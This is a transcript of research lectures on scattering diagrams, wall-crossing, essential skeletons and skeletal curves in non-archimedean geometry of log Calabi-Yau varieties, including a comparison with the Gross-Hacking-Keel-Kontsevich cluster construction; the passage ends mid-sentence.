consider the infinitesimal spine V(x, v, w) bending once at x.
The spine bends at x with incoming direction w and outgoing direction v, and this gives rise to an associated count of analytic curves N(V, α). So we consider the infinitesimal spine bending once at a generic point x in the hyperplane n^⊥, with specified incoming and outgoing directions, and the associated count of analytic curves. Using all these counts, for any generic point x in some hyperplane n^⊥ we define the following wall-crossing transformation ψ_{x,n}, acting on the basis vectors z^v as follows. For every v in M pairing positively with n, we define ψ_{x,n}(z^v) to be the sum, over every vector w in M pairing positively with n and over all curve classes α, of the basis vector z^α z^w with coefficient the count we just defined; in other words, we sum over all possible incoming directions w and all possible curve classes. For every v in M pairing trivially with n, i.e. lying in the hyperplane, we simply set ψ_{x,n}(z^v) = z^v: the wall-crossing transformation does nothing to such z^v. Unlike in the multiplication rule, this sum is not finite, but it converges in a natural adic topology, which we now describe. Since the cone of curves may not be polyhedral, we fix a strictly convex toric monoid Q containing the effective curve classes, and let R̂ be the completion of the monoid ring Z[Q ⊕ M] with respect to the maximal monomial ideal I, in other words the ideal generated by the monomials z^q z^m with q nonzero and m arbitrary. We use this completion to express the convergence. Convergence lemma: the formal sum in the wall-crossing transformation lies in R̂. The reason is that a bound on the curve class implies a bound on the combinatorial types of the twigs of all analytic curves contributing to these counts, and this in turn gives a bound on the incoming directions w. Now, by linearity over the monoid ring, we extend the wall-crossing transformation to a map from the monoid ring on Q ⊕ {m ∈ M : ⟨n, m⟩ ≥ 0} to R̂: we have defined it on basis vectors, and we extend by linearity. Theorem (wall-crossing homomorphism): the map ψ_{x,n} is a ring homomorphism. This means that for arbitrary m_1, m_2 in M pairing non-negatively with n, we have ψ(z^{m_1 + m_2}) = ψ(z^{m_1}) ψ(z^{m_2}).
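As a recap before the proof, here is the wall-crossing transformation written out, using the convention from the definition above (v outgoing, w incoming) and writing N(x, v, w, α) for the count of infinitesimal analytic cylinders bending at x; the formula is only my transcription of the verbal definition.
\[
\psi_{x,n}(z^{v})=
\begin{cases}
\displaystyle\sum_{\substack{w\in M\\ \langle n,w\rangle>0}}\ \sum_{\alpha}\,
N(x,v,w,\alpha)\, z^{\alpha} z^{w}, & \langle n,v\rangle>0,\\[2.2ex]
z^{v}, & \langle n,v\rangle=0,
\end{cases}
\qquad
\psi_{x,n}\big(z^{m_1+m_2}\big)=\psi_{x,n}\big(z^{m_1}\big)\,\psi_{x,n}\big(z^{m_2}\big).
\]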
Let us prove this. Fix any vector e in M and any curve class α, and let us prove the equality of the coefficients of z^α z^e on both sides. The equality is obvious when both m_1 and m_2 lie in n^⊥, because then the wall-crossing transformation does nothing to them; so we may assume that one of them pairs positively with n, say ⟨n, m_1⟩ > 0 and ⟨n, m_2⟩ ≥ 0. We consider the count of analytic pairs of pants associated to the infinitesimal spine with three legs, whose three ends are near x with directions m_1, m_2 and −e. Claim: if x is contained in the wall σ, then this count is independent of which side of σ the trivalent vertex of the spine maps to. In the pictures the spine maps to the essential skeleton and the blue line is the wall; the left picture shows the situation where the trivalent vertex maps to the left of the wall, and the right picture the situation where it maps to the right, so the claim says the count does not depend on which side the trivalent vertex goes. Observe further that in the left picture, once we specify the directions m_1, m_2 and e, the shape of the spine is unique — we denote it S_L — because there is only one possible bend, and that bend is determined by the three directions at the ends. In the right picture, however, the shape of the spine is not unique: there are two bends, and when we deform from left to right the single bend decomposes into two bends, with all possible decompositions allowed. So in the right-hand picture we are actually summing over many different shapes of spines, which we denote by S_{R,i}. [Question from the audience: is this still true when m_2 is parallel to the wall?] Yes, that is the trickiest possibility, but m_2 is indeed allowed to be parallel to the wall, and it is exactly this possibility that yields the preservation of the volume element, as we will see; so we keep in mind that m_2 parallel to the wall is also allowed. As Maxim remarked, in the proof we use the proposition on toric tail conditions in families from the last lecture, and the trickiest case is when one of m_1 or m_2 lies in n^⊥, i.e. is parallel to the wall, where we need the deformation invariance for almost-transverse spines. That is the proof of the claim, the deformation invariance when we move from left to right; now let us go back to the proof of the wall-crossing homomorphism theorem. Note that for any spine L disjoint from the walls, the count N(L, γ) is 1 if γ = 0 and 0 otherwise, because away from the walls we are essentially in the toric situation and everything can be computed explicitly. Keeping this in mind, consider first the left picture. If we cut the spine S_L at the cross, then by the gluing formula the count associated to (S_L, α) gives the coefficient of z^α z^e in the wall-crossing transformation: when we cut at the cross, the left part is disjoint from the walls, so it does not contribute, while the right part has a bend and is exactly the infinitesimal cylinder used in the definition of the wall-crossing transformation. Therefore counting analytic curves associated to S_L gives the coefficient in the wall-crossing transformation. Next consider the right picture, where the trivalent vertex maps to the right, and cut the spine S_{R,i} at the two crosses; by the gluing formula the spine breaks into three pieces. The right piece is disjoint from any walls, so it does not contribute, while the two left pieces each have a bend and both contribute, and we add their contributions together.
By the gluing formula, the count associated to the spine S_{R,i} equals the sum, over all decompositions of the curve class α into α_1 + α_2, of the count associated to the upper-left piece times the count associated to the lower-left piece; and recall that when the trivalent vertex maps to the right of the wall we have different shapes parametrized by i. Summing over all possible shapes S_{R,i}, we see that the sum of the counts associated to the S_{R,i} gives exactly the coefficient of z^α z^e in the product of the two wall-crossing transformations. By the claim, the two coefficients agree, which concludes the proof of the wall-crossing homomorphism theorem: the wall-crossing transformation is a ring homomorphism. An immediate consequence is the following. Given any generic x in some hyperplane n^⊥ and any vector v in M whose pairing with n equals 1 — so in particular n is necessarily a primitive vector — we may rewrite ψ_{x,n}(z^v) as z^v times some function f(x, n, v) in R̂; this is just a rewriting. The fact that the wall-crossing transformation is a ring homomorphism implies that the function f(x, n, v) does not depend on v. Geometrically, this means that the count of infinitesimal analytic cylinders depends only on the amount of bending, independently of the incoming or outgoing direction: as long as the bend is the same, changing the incoming or outgoing direction does not change the count. In particular, the wall-crossing transformation preserves the standard volume form on the torus. Moreover, we have the equality f(x, n, v) = f(x, −n, v): the function is independent of the orientation of the wall. So we may denote it simply by f_x, for any choice of primitive n with x ∈ n^⊥ and any choice of v with ⟨n, v⟩ = 1, and we call f_x the wall-crossing function attached to x. Here is the conclusion: we can now write the wall-crossing transformation applied to z^v simply as z^v times f_x raised to the power ⟨n, v⟩, for any vector v in M pairing non-negatively with n. This resembles the more classical wall-crossing formula, and using it we see that the wall-crossing transformation ψ_{x,n} extends to an automorphism of the fraction field of R̂. Let me remark that it may not give an automorphism of R̂ itself, since the wall-crossing function need not be invertible in R̂: because of curve classes it might not start with 1 — it might start with a monomial carrying a nontrivial curve class, which is not invertible. That is simply how it is when we keep track of curve classes; it will become invertible once we set all curve classes to zero. Definition: now that we have all the wall-crossing functions, we can define our scattering diagram. Let D be the set of pairs (x, f_x), where x is any generic point in a hyperplane n^⊥ for some nonzero n and f_x is the associated wall-crossing function. We call this set the scattering diagram associated to U, with respect to the compactification Y and the torus T_M; so the scattering diagram depends on the choice of torus.
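The closed form of the wall-crossing transformation and the resulting scattering diagram, as just described, can be displayed as follows; this is the formula stated above written in symbols, with f_x the wall-crossing function attached to x and n primitive with x ∈ n^⊥.
\[
\psi_{x,n}(z^{v})\;=\;z^{v}\,f_x^{\,\langle n,v\rangle},
\qquad v\in M,\ \langle n,v\rangle\ge 0,
\qquad
\mathcal D\;=\;\big\{(x,f_x)\ :\ x\ \text{generic in some hyperplane } n^{\perp}\big\}.
\]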
We remark that, by the adic convergence of the wall-crossing functions f_x, if we mod out by some power of I, the maximal monomial ideal, then we obtain a finite scattering diagram D_k; finite means that D_k has only finitely many polyhedral walls. In D itself there are infinitely many walls, so it no longer makes sense to speak of the shape of each wall — they are so small that it is better just to give the wall-crossing function attached to each generic point — but once we mod out by a power of the maximal monomial ideal we get finite scattering diagrams D_k with finitely many polyhedral walls, and we call D_k the k-th order approximation of D. One important property of a scattering diagram is consistency, so let us try to establish it. First we establish a variant which we call theta-function consistency, and for that we introduce a new definition. Choose any generic point x in M_R and two vectors m, e in M, and let Sp(x, m, e) be the set of spines in M_R with domain (−∞, 0], such that −∞ maps to the boundary with derivative −m and 0 maps to x with derivative −e. So we consider the set of all such red spines, starting at infinity and ending at x, with directions m and e at the two ends; this is related to the notion of broken line in GHKK. We define the local theta function θ_{x,m} to be the formal sum, over all vectors e, all such spines S and all curve classes α, of the basis vector z^α z^e with coefficient the count associated to S and α. Again we have adic convergence, so this lives in R̂. We then have the following theta-function consistency theorem: the scattering diagram D is theta-function consistent in the following sense. Given any k, consider the k-th order approximation D_k of our scattering diagram, take a polyhedral wall σ in D_k with attached wall-crossing function f_σ, and choose a vector n such that the wall is contained in the hyperplane n^⊥. Consider a general point x in the wall and two general points a and b near x, on the two sides of the wall, with ⟨n, a⟩ > 0 and ⟨n, b⟩ < 0. Then, applying the wall-crossing transformation ψ to the local theta function at a with infinite direction m gives the local theta function at b with the same infinite direction; and conversely, applying the wall-crossing transformation with respect to the opposite orientation of the wall to θ_{b,m} gives back θ_{a,m}. This is what we call the theta-function consistency property, and its proof uses the gluing formula and deformation invariance.
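In symbols, the local theta function and the consistency statement just described might be written as follows; again this is my transcription of the verbal definitions, with N(S, α) the count attached to a spine S ∈ Sp(x, m, e) and a curve class α, and a, b general points near a general point x of a wall, on the positive and negative sides with respect to n.
\[
\theta_{x,m}\;=\;\sum_{e\in M}\ \sum_{S\in \mathrm{Sp}(x,m,e)}\ \sum_{\alpha} N(S,\alpha)\, z^{\alpha} z^{e}\ \in\ \widehat R,
\qquad
\psi_{x,n}\big(\theta_{a,m}\big)=\theta_{b,m},
\qquad
\psi_{x,-n}\big(\theta_{b,m}\big)=\theta_{a,m}.
\]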
Our next step is to forget all curve classes: we want to get closer to the classical wall-crossing structure, the classical scattering diagram, without always thinking about curve classes in our compactification. As I said, our wall-crossing transformations and our scattering diagram depend on the compactification of U inside Y through the use of curve classes in Y; this is more refined information, but we can remove the dependence by setting all curve classes to zero. In order to keep adic convergence when we set all curve classes to zero, we need to impose a condition on the bends of the infinitesimal analytic cylinders; without this extra condition, adic convergence is lost once the curve classes are forgotten. The assumption is the following: for any nonzero count associated to an infinitesimal spine at x with outgoing and incoming directions v and w, the bend w − v lies in a fixed strictly convex monoid P inside M. We need this assumption in order to have adic convergence after forgetting curve classes. Here is the new adic setup: thanks to this assumption, we consider J, the maximal monomial ideal in the monoid ring Z[P], let L̂_0 be the J-adic completion of Z[P], and finally let L̂ be L̂_0 ⊗_{Z[P]} Z[M]. In other words, we complete Z[M] in the direction of the strictly convex monoid P: we allow infinite sums in the P-direction and only finite sums in all other directions. Proposition: under the quotient from the monoid ring of Q ⊕ P to the monoid ring of P, i.e. when we ignore all curve classes, the wall-crossing functions f_x in R̂ map to quotient wall-crossing functions f̄_x in L̂, meaning that after ignoring curve classes they still converge adically, now in L̂; the wall-crossing transformations ψ_{x,n}, which used to be automorphisms of the fraction field of R̂, become automorphisms of L̂ — we no longer need a fraction field, because after forgetting curve classes the wall-crossing transformations are automatically invertible; and the local theta functions in R̂ map to quotient theta functions in L̂. So all of these objects have J-adic convergence, and moreover the wall-crossing transformations become invertible. We now let D_U be the set of pairs (x, f̄_x), where x is any generic point in any hyperplane n^⊥ and f̄_x is the associated wall-crossing function with all curve classes ignored, and we call this the scattering diagram associated to U with respect to the torus T_M. We then have the following consistency result: the scattering diagram D_U is consistent in the sense of Kontsevich–Soibelman, in other words for any general loop in M_R, the composition of the wall-crossing automorphisms (after ignoring curve classes) along the loop is the identity. For the proof, we observe that the subring of L̂ generated by all local theta functions is adically dense, and the theorem then follows from the theta-function consistency. That completes the general construction of the scattering diagram via counts of infinitesimal analytic cylinders; now let us apply these constructions to the case of cluster algebras. Here is the cluster data: we have a lattice M with an integer-valued skew-symmetric form, a basis S′ of M, and a subset S of S′. This is a seed for a skew-symmetric cluster algebra of geometric type, where S corresponds to the unfrozen variables and S′ ∖ S to the frozen variables. The seed gives rise to A, a Fock–Goncharov A-type cluster variety, which is the gluing of tori via cluster mutations, and we let A^up, the algebra of global functions on A, be the upper cluster algebra. We assume that the skew-symmetric form is unimodular — partly for convenience.
It holds in the principal coefficient case, and we will deduce the more general cases from the principal coefficient case. We also assume that the spectrum of the upper cluster algebra, which we denote by U, is smooth; for example, double Bruhat cells in semisimple complex Lie groups satisfy this smoothness assumption. I think it is possible to extend our work to cover the non-smooth case without too much extra effort, but I have not checked all the details. Then U is a log Calabi–Yau variety containing a torus T_M, so we can apply our theory to U and obtain a mirror algebra as well as a canonical scattering diagram by counting non-archimedean analytic curves. Here is the question: how shall we compare this with the constructions in the paper of Gross–Hacking–Keel–Kontsevich? The idea is the following. In GHKK the mirror algebra is built from the scattering diagram, and the scattering diagram is built by specifying the initial walls and running the Kontsevich–Soibelman algorithm. Therefore, for the comparison with GHKK, by the uniqueness property of the Kontsevich–Soibelman algorithm it suffices to compare the sets of incoming walls. However, we have defined walls simply as images of twigs of tropical curves, and we have no notion of incoming or outgoing walls in this generality. Therefore, in the cluster case we introduce a more restrictive notion of twigs and walls, which allows us to distinguish incoming from outgoing walls and to better control the monomials in the scattering functions; we call them C-twigs and C-walls, where C stands for cluster. A C-twig is a twig such that each infinite leg maps to a hyperplane e^⊥, with derivative some multiple of e, for some e in the basis corresponding to the unfrozen variables. It is easy to see that, in the cluster case, for every stable map in the moduli space we are interested in, the twigs of the associated tropical curve are all C-twigs. Next we define a C-wall to be a pair (σ, n), where n lies in P, the submonoid of M generated by S, and σ, contained in the hyperplane n^⊥, is a closed convex rational polyhedral cone. A C-wall is called incoming if n lies in σ, and outgoing otherwise; so a C-wall carries the slightly more refined information of the direction vector n. Now we construct a collection of C-walls by induction. We start with W_0, the collection of C-walls of the form (e^⊥, n), where e is any basis vector corresponding to an unfrozen variable and n is any positive multiple of e; we call these the initial C-walls. Then, by induction, assuming we already have W_0, …, W_t, we define W_{t+1} as follows: for every pair of C-walls in W_t such that either the pairing of the two direction vectors is nonzero or the two direction vectors are parallel, we form the sum of the two C-walls — written out in the display below — whose support is σ_1 ∩ σ_2 minus all positive multiples of n_1 + n_2 and whose direction is n_1 + n_2; we check that this is again a C-wall, and we add all such sums to W_t to form W_{t+1}. Finally we let W be the union of all the W_t. It is important here that we do not add walls when the two direction vectors have pairing zero but are non-parallel, because this corresponds to a non-transverse situation.
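For concreteness, here is one way to write the inductive step in symbols. The reading of the support as a set-theoretic difference follows the phrase "σ₁ ∩ σ₂ minus all positive multiples of n₁ + n₂" above; I am not certain whether a Minkowski-type operation is intended instead, so treat this as an illustrative transcription rather than the precise definition, with the pairing taken under the given skew-symmetric form.
\[
(\sigma_1,n_1)+(\sigma_2,n_2)\;:=\;\Big(\,(\sigma_1\cap\sigma_2)\smallsetminus \mathbb R_{>0}\,(n_1+n_2),\ \ n_1+n_2\,\Big),
\qquad
W\;=\;\bigcup_{t\ge 0} W_t,
\]
the sum being added only when the pairing of n₁ and n₂ is nonzero or n₁ and n₂ are parallel; a C-wall (σ, n) is incoming when n ∈ σ and outgoing otherwise.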
Two consequences of the construction are the following. First, the incoming C-walls of W are exactly the initial C-walls. Second, for any generic C-twig and any edge, there is always some C-wall in our collection W such that the image of the edge lies in the support of the C-wall and the derivative equals the direction of the C-wall. We remark that, for the scattering diagram associated to U, the second consequence implies that the wall-crossing function attached to a point x always has exponents that are multiples of the direction n whose orthogonal hyperplane contains x; a priori the exponents could be quite arbitrary, but from the notions of C-twigs and C-walls we get a strong restriction on the shape of the scattering functions. Now we are ready to deduce the comparison with GHKK. Let D_GHKK be the scattering diagram of GHKK: it is produced by the Kontsevich–Soibelman algorithm from the set of initial walls e^⊥ with scattering function 1 + z^e, for every basis vector e corresponding to an unfrozen variable. Therefore, by the uniqueness property of the Kontsevich–Soibelman algorithm and by the identification of the incoming C-walls in our setting just above, it remains to show that our C-walls have the same wall-crossing functions; in other words, it is enough to show the following claim: for each e in S and any generic point x in e^⊥, the attached scattering function, forgetting curve classes, is just 1 + z^e. This can be done by first figuring out what the twigs look like and then by an explicit computation. From this we immediately deduce the comparison theorem for the scattering diagrams, between our scattering diagram and the GHKK scattering diagram, and then the comparison theorem in both the A-cluster and the X-cluster case. Recall that in the first lecture I mentioned five consequences of the comparison theorem; roughly, the comparison theorem gives geometric interpretations of, and more conceptual understandings of, many constructions in GHKK, and it also proves some of their conjectures. Since I don't have much time left: in the first lecture I also mentioned another application of our theory, to the study of moduli spaces of Calabi–Yau pairs; I can probably explain it on some other occasion. Thank you very much for your attention. — Okay, thank you, and thank you for the lectures. Maybe some people want to ask questions; please just unmute yourself and ask. — For me the last part was very familiar, so it was too easy; maybe a general question: in the situation where we don't have the nice affineness assumptions, the mirror algebra is not an algebra? — It is just formal, but it is still an algebra in a formal sense. — Yes, so probably you would want it to be some affinoid algebra. — Yes, without affineness; but in any case we need some positivity assumption, because, as we saw in the proof of deformation invariance, we must prevent bubbles from moving from the interior to the boundary. We want to count analytic discs in the log Calabi–Yau variety U, and we do not want to count analytic discs that have something to do with the boundary; without affineness, or some other sort of positivity assumption, we cannot count analytic discs in U, because they can have bubbles or deform and touch the boundary. So I guess that in order to count analytic discs we need at least that the log Calabi–Yau be proper over something affine — some kind of semi-positivity of the boundary; properness over an affine is really what is used.
Proper over affine is sufficient here, and properness over affine is equivalent to the condition that some positive combination of the boundary components is nef; both conditions are equivalent, and they are natural conditions. Such varieties also appear, for instance, in GIT, which usually produces varieties that are projective over an affine; so I think assuming proper over affine — that is, projective over affine — is a satisfactory setting, and it also covers the projective case over a point. Okay, if there are no more questions, then let us thank the speaker for this nice series of lectures; thank you, Maxim, and thank you everyone for your attention.
|
4/4 - Scattering diagram, comparison with Gross-Hacking-Keel-Kontsevich, applications to cluster algebras, applications to moduli spaces of Calabi-Yau pairs. --- We show that the naive counts of rational curves in an affine log Calabi-Yau variety U, containing an open algebraic torus, determine in a surprisingly simple way, a family of log Calabi-Yau varieties, as the spectrum of a commutative associative algebra equipped with a multilinear form. This is directly inspired by a very similar conjecture of Gross-Hacking-Keel in mirror symmetry, known as the Frobenius structure conjecture. Although the statement involves only elementary algebraic geometry, our proof employs Berkovich non-archimedean analytic methods. We construct the structure constants of the algebra via counting non-archimedean analytic disks in the analytification of U. We establish various properties of the counting, notably deformation invariance, symmetry, gluing formula and convexity. In the special case when U is a Fock-Goncharov skew-symmetric X-cluster variety, we prove that our algebra generalizes, and in particular gives a direct geometric construction of, the mirror algebra of Gross-Hacking-Keel-Kontsevich. The comparison is proved via a canonical scattering diagram defined by counting infinitesimal non-archimedean analytic cylinders, without using the Kontsevich-Soibelman algorithm. Several combinatorial conjectures of GHKK follow readily from the geometric description. This is joint work with S. Keel; the reference is arXiv:1908.09861. If time permits, I will mention another application of our theory to the study of the moduli space of polarized Calabi-Yau pairs, in a work in progress with P. Hacking and S. Keel. Here is a plan for each session of the mini-course: 1) Motivation and ideas from mirror symmetry, main results. 2) Skeletal curves: a key notion in the theory. 3) Naive counts, tail conditions and deformation invariance. 4) Scattering diagram, comparison with Gross-Hacking-Keel-Kontsevich, applications to cluster algebras, applications to moduli spaces of Calabi-Yau pairs.
|
10.5446/51039 (DOI)
|
Thank you very much for coming to the second lecture of this mini-course. Here is the plan for today. First, I'll explain the theory of Temkin's metrization and the Kontsevich–Soibelman essential skeleton. Second, I'll introduce skeletal curves, a key notion in the theory. Third, I'll explain where skeletal curves come from in practice — the natural sources of skeletal curves. Fourth, I will introduce naive counts of skeletal curves. Finally, I will give a proof of the symmetry theorem via skeletal curves, as an application of the theory of skeletal curves; we will see other applications in the next lectures. Okay, let's start with the first part, Temkin's metrization and the Kontsevich–Soibelman essential skeleton. The idea is the following. Berkovich non-archimedean analytic spaces have very complicated underlying topological spaces. For example, the analytic P^1 is an infinite tree containing infinitely many vertices and infinitely many branches, and a Berkovich analytic elliptic curve is infinitely many trees attached to a circle. It is impossible to visualize Berkovich analytic spaces in higher dimensions, but they contain very nice piecewise-linear subsets called skeletons. In general skeletons are not unique — they depend on the choice of a formal model — but if we are given a volume form ω on the analytic space, then we can define a unique skeleton Sk(ω) associated to ω. Thus, for a Calabi–Yau variety, where the volume form is unique up to scaling, we have a canonical skeleton called the essential skeleton; for example, the circle inside the analytic elliptic curve is its essential skeleton. Here is the history of the essential skeleton. In 2000, Kontsevich and Soibelman constructed an essential skeleton inside the non-archimedean analytic Calabi–Yau space X over C((t)) — the field of formal Laurent series — in the case of maximal degeneration. Their method is the following: first they define a weight function ψ on the set X^div of divisorial points of X, using semistable models of X, and then they define the essential skeleton Sk(X) ⊂ X to be the closure of the minimum locus of ψ. After that, in 2012, Mustață and Nicaise extended the weight function ψ to the whole analytic space, so it is no longer necessary to take a closure when defining the essential skeleton. Then, in 2017 and 2018, Brown–Mazzon and Mauri–Mazzon–Stevenson extended the weight function and the essential skeleton to pairs. And in 2014 — not quite in chronological order — Michael Temkin gave a vast generalization: he completely bypasses the use of semistable models, and in this way he is able to extend the theory of the weight function and the essential skeleton to any non-archimedean base field, not necessarily of characteristic zero or discretely valued; moreover, his theory works in the relative situation, for any analytic space X over another analytic space S. His method is the following. First, he equips the sheaf of Kähler differentials Ω_X with a maximal seminorm, called the Kähler seminorm: it is the maximal seminorm making the differential d, from the sheaf of functions on X to the sheaf of differentials on X, a non-expansive map. This gives rise to a seminorm on the canonical bundle K_X by taking the top exterior power of the sheaf of Kähler differentials.
Now, if we have a volume form ω and we apply this seminorm to ω, we obtain a real-valued function, and Temkin proved that this function equals, up to a constant, the Kontsevich–Soibelman–Mustață–Nicaise weight function in the situations where the weight function is defined. The essential skeleton, in Temkin's language, is just the maximum locus of the Kähler seminorm of this volume form. This is roughly his method; since we will need Temkin's formulation to establish some properties of essential skeletons used in our proofs, let me give more details of his construction. First we define the seminorm at the level of rings. Definition: given a seminormed ring B and a ring homomorphism φ: A → B, we equip Ω_{B/A}, the module of relative Kähler differentials, with the Kähler seminorm, defined by the following formula. For any element x of Ω_{B/A}, we write x as a sum Σ_i c_i db_i with c_i, b_i elements of B, take the maximum over i of |c_i|·|b_i|, and then take the infimum of this maximum over all possible ways of writing x as Σ_i c_i db_i. This defines the Kähler seminorm at the level of rings, and Temkin gives a canonical characterization of this seminorm defined by the explicit formula: it is the maximal seminorm making the differential d: B → Ω_{B/A} a non-expansive homomorphism. Now consider the global geometric situation. Given a morphism f of K-analytic spaces, where K is any non-archimedean base field, applying the above ring-level definition we immediately obtain a presheaf of Kähler seminorms on affinoid domains; via sheafification we obtain the Kähler seminorm on the sheaf of relative Kähler differentials, and we have a canonical characterization as in the lemma above: Temkin shows that this sheafified norm is simply the maximal seminorm on the sheaf of relative differentials making the map d, from the sheaf of functions to the sheaf of differentials, non-expansive. Taking top exterior powers and arbitrary tensor powers, we obtain the Kähler seminorm on pluricanonical forms. There is a small technical point: one has in fact to consider the so-called geometric Kähler seminorm, obtained after passing to the algebraic closure, in order to get better properties. Here is a theorem of Temkin: for any pluricanonical form ω, taking its Kähler seminorm yields a real-valued function on X, and this function is upper semicontinuous. Now we make the following definition: the skeleton of X associated to a pluricanonical form ω is the maximum locus of the Kähler seminorm of ω — possibly empty, if the maximum does not exist — and we denote this skeleton by Sk(ω), considered as a subset of X. So this definition of skeleton depends on the choice of a pluricanonical form.
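To fix the formula just described, the ring-level Kähler seminorm and the associated skeleton can be written as follows; this is only a restatement of the definitions above in symbols.
\[
\|x\|_{\Omega}\;=\;\inf\Big\{\ \max_i\ |c_i|\cdot|b_i|\ \ :\ \ x=\sum_i c_i\,db_i,\ \ c_i,b_i\in B\ \Big\},
\qquad
\mathrm{Sk}(\omega)\;=\;\Big\{\,y\in X\ :\ \|\omega\|(y)=\max_{X}\|\omega\|\,\Big\}.
\]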
Now let us introduce the definition of the essential skeleton, which is just the union of all such skeletons over all possible volume forms. Definition (essential skeleton): let K be a non-archimedean field of characteristic zero and let X be any smooth K-variety. We define the essential skeleton of X, denoted Sk(X), to be the union of the skeletons Sk(ω) over all log pluricanonical forms ω. By definition, a log pluricanonical form is a section of some tensor power of the logarithmic canonical bundle: we take any SNC compactification X ⊂ Y, with D the complement of X, and consider sections of tensor powers of the logarithmic canonical bundle of the pair (Y, D); one can show that this space of sections is independent of the SNC compactification we choose. So we choose any SNC compactification, consider all log pluricanonical forms, take the associated skeletons, and take their union: that, by definition, is the essential skeleton of X. Since we have taken the union over all such forms, it is canonically associated to X. Let us also introduce a notation for later use: when a compactification X ⊂ Y is fixed, it is quite natural to consider the closure of the essential skeleton of X inside the analytification of Y; we denote this closure by Sk̄(X) and sometimes call it the closed essential skeleton.
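In symbols, the definition just given reads as follows, where (Y, D) is any SNC compactification of X and the union runs over nonzero log pluricanonical forms, i.e. sections of tensor powers of the logarithmic canonical bundle as described above.
\[
\mathrm{Sk}(X)\;=\;\bigcup_{m\ge 1}\ \ \bigcup_{0\neq\omega\in H^0\!\big(Y,\,(K_Y+D)^{\otimes m}\big)} \mathrm{Sk}(\omega)\ \subset\ X^{\mathrm{an}},
\qquad
\overline{\mathrm{Sk}}(X)\;=\;\text{closure of }\ \mathrm{Sk}(X)\ \text{in}\ Y^{\mathrm{an}}.
\]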
Let us give some examples of essential skeletons. First example: X the algebraic torus. In this case the essential skeleton of X is homeomorphic to R^n and lives inside the analytification of the torus. One can show that the essential skeleton is in fact a birational invariant (with respect to volume forms, of course), so if U is a log Calabi–Yau variety containing a Zariski-open torus T_M — M being the cocharacter lattice, as in the previous talk — then the essential skeleton of U equals the essential skeleton of the torus and is homeomorphic to M_R, the lattice M tensored with R; so it is just R^n. For our log Calabi–Yau varieties the essential skeleton is therefore very simple, just a Euclidean space. Second example: X equal to P^1 minus some closed points. In this case the essential skeleton of X is the convex hull of these points. Recall that the analytic P^1 is an infinite tree with infinitely many vertices and branches, and we remove some closed points, which are points on the boundary of the disc; the claim is that the essential skeleton of the punctured P^1 is the convex hull of these points. For instance, if we remove four closed points, the essential skeleton is the convex hull of those four points, a red subtree inside the infinite tree. Example three: X an elliptic curve with bad reduction, whose analytification is infinitely many trees attached to a circle; in this case the essential skeleton is just the circle inside this analytic space. There is a two-dimensional analogue of this example: X a K3 surface with maximal degeneration, whose essential skeleton is homeomorphic to S^2, the two-dimensional sphere, inside the analytification of X. The final example: X = M_{0,n}, the moduli space of P^1 with n marked points. We show that the essential skeleton of X is homeomorphic to M^trop_{0,n}, the moduli space of rational tropical curves with n legs. We show this by considering the classical Deligne–Mumford compactification M̄_{0,n} of X, consisting of stable n-pointed rational curves: we show that it gives a minimal compactification, and we deduce that the essential skeleton is the skeleton associated to this compactification, a skeleton previously studied in the work of Abramovich, Caporaso and Payne. That is all I want to say for the moment about Temkin's metrization and the essential skeleton. Now let us turn to the next section, where we introduce the notion of skeletal curves, a key notion in the theory. The idea is the following. Consider an analytic curve C in the analytification of our log Calabi–Yau U. We have the analytification of U and, inside it, the blue essential skeleton, a piecewise-linear subset embedded in this analytic space; and we consider a red analytic curve C inside our Calabi–Yau. If the dimension of U is at least 2, then for dimension reasons the curve C never meets the essential skeleton: the points of the essential skeleton are valuations on the generic point of the variety U, of top dimension, while the points of the curve C have dimension at most one, so the curve has no chance of meeting the essential skeleton, simply for dimension reasons. But we can let the curve C touch the essential skeleton Sk(U) if we allow C to be defined over a big non-archimedean field extension K ⊂ K′. And here is the surprise: as soon as some K-point of the curve C touches the essential skeleton of U, the whole skeleton of the curve C must lie in the essential skeleton of U. So in general, for dimension reasons, there is no chance for a curve C to touch the green essential skeleton; but if we allow the curve C to be defined over a big enough non-archimedean field extension, then as soon as some K-point of C touches Sk(U), the whole skeleton of C lies in Sk(U). Now let us give the precise statement. We fix a log Calabi–Yau variety U over K, a volume form ω on U, an SNC compactification U ⊂ Y, and we let D be the divisor at infinity. We denote by D^ess ⊂ D the union of the essential divisors, by which we mean the divisors along which the volume form ω has a pole; in the picture, the dark blue curves denote essential divisors while the light blue curve is a non-essential divisor. We now consider a curve C in Y, the red curve, touching some points of the boundary divisor. As we said, if we want the curve to touch the skeleton, we must pass to a big enough base field extension; so let K ⊂ K′ be a non-archimedean field extension, and choose C a rational nodal curve over K. We consider f, a K′-analytic map from the base change of C to the base change of Y, such that the preimage under f of the divisor D equals the preimage under f of its essential part D^ess; in other words, the curve C meets only essential divisors at infinity.
Furthermore, we ask that the preimage of the essential divisors be a linear combination of K-points p_i of C: such a curve mainly lies in the interior U, and when it hits the boundary divisor it hits only the essential part, at K-rational points, with some multiplicities. So f is a K′-analytic map between the base changes, and we consider the composition of f with the natural projection coming from the base change — we have made a base change, and we compose with the natural projection — and we denote this composition by f_Y. The claim is the following: if f_Y(x) lies in the essential skeleton of U for some K-point x, then f_Y maps the essential skeleton of the base change of the punctured curve C_0 — C_0 being C minus the marked points — into the essential skeleton of U. In other words, the whole skeleton of the curve lies in the essential skeleton of U. Recall from the example mentioned above that the essential skeleton of such a punctured curve is just the convex hull of all the marked points in the analytic space. This is the precise statement, and we call such maps f skeletal curves. Here is an example of a skeletal curve. Take U to be the algebraic torus; we have seen from the examples above that its essential skeleton is R^n, the blue plane. Take the curve C to be P^1 — an infinite tree — and choose four marked points on it; the essential skeleton of the punctured curve C_0 = C minus the four marked points is the convex hull of these four points, the red subtree inside the infinite tree. Now consider a map from this P^1 to the algebraic torus. As we said, in general the image of this P^1 has no chance of meeting the blue essential skeleton, simply for dimension reasons; but if we pass to a big enough base field extension it can happen, and the theorem says that if some K-point of the curve hits the blue essential skeleton, then the whole skeleton of the curve — the red subtree — lies in the essential skeleton of U. The major advantage of skeletal curves is that they have a canonical tropicalization. Since the map f_Y sends the skeleton of the curve into the essential skeleton of U, we can simply restrict f_Y to the skeleton of the curve and obtain a tropical object: a map from a finite tree Γ to this polyhedral object. This restriction is independent of any choice of retraction from the analytification of U onto the essential skeleton of U. For a general curve, the image of the skeleton of the curve does not lie in the essential skeleton of U, so to get anything tropical we must further compose with a retraction from the analytification of U onto the essential skeleton, and this retraction is not canonical: different minimal compactifications U ⊂ Y give different retraction maps, so for a general curve different retractions give different tropicalizations. But for skeletal curves the compactification does not matter: we always have a canonical tropicalization, and we call this restriction the spine associated 